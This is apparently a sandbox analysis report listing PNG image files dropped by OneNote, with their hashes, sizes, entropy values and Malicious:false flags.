                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
